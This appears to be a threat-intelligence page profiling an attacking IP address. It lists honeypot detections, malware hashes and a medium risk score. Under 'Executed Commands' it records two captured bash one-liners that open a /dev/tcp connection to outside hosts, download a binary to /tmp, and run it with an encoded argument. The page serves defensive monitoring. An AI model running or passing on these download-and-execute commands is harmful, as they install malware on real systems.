โš TROYANOSYVIRUS
Active Threat โ€ข MEDIUM

124.236.108.172

First Detection2/3/2026
Last Activity2/14/2026
ISPOVH SAS
๐ŸŽฏ
50
Total Attacks
๐Ÿ”Œ
2
Ports
๐Ÿ“ก
2
Attack Types
๐Ÿฆ 
2
Malware

Geolocation

Country
๐Ÿ‡จ๐Ÿ‡ฆ Canada
City
Unknown
ASN
AS16276
ISP
OVH SAS

Attack Types

cowrie
redishoneypot

Attacked Ports

226379

Associated Malware

1e09571e5da2eafba190...โ†’df1c24d7159d41f3b1bf...โ†’

Executed Commands

$nohup bash -c "exec 6<>/dev/tcp/8.222.163.205/60112 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/Ms8wLCbxCp && chmod +x /tmp/Ms8wLCbxCp && /tmp/Ms8wLCbxCp q36uAdZLkA/TfKfMTJuTQtKmfdkBlkjdAadq0shvrh/KSJEb13mm0kOJmELauXjQGIlL0xy4at7caKYe0EiHGc97pdBamJ1GzKZ/0BuRStUeoX7S0XCkHNNUlhHUZ6XRRZOfRNOje8EZiUjVFrhv1tVwpB7cQJER0H2kwkCeh0bRoGfQEJNU1hujZNDWb6UYxEKJE9N7udNAkYdF26dz1xGWSdAPomnI1G2hAdVKkQ/QfqXYQpmYR9W3cc8TlkPKHqZmyNdmoxXSSpYQ0Wmm0ECHm0fUuXjRGYlI1hasaNbXbaEP3FSVENhnpdNHh5tN2KF50BKUWtwBpG/fyGuhAdV1x
$nohup bash -c "exec 6<>/dev/tcp/8.219.255.181/60121 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/hy8ssZNvUW && chmod +x /tmp/hy8ssZNvUW && /tmp/hy8ssZNvUW ztDSnU1f966KjTCWgLL6WE+C3sivvsbSnU5f+a6JjzOWjLj6WE+C3sKvvsLTnU5a9K6JgDCWirb6WE+C2sevu8fEgUxZ7rmNljGPgrbwX06DysihvcHTnUhY7rGKjDqOiLH0Wl+LxMK+tt7YhkpA8biJgjaIibLxTked2MG2ocHfh1FZ97qOiDGIgaD0WVGB2cehvsHenU1a9bqOiDGLj6D0WVGB2cahvsXcnU5f9LqOiDGLjKD4QE2C0969vMTEhE5U9rCJiDaYjLfuXEyExMG/t97ZikVY8LGMiiCAlrLxV1GC3t69vMLQhU9f8biYiTKMlrLzWFGC2sihvsTbiUl1x

Risk Assessment

45
/100
LowMediumHighCritical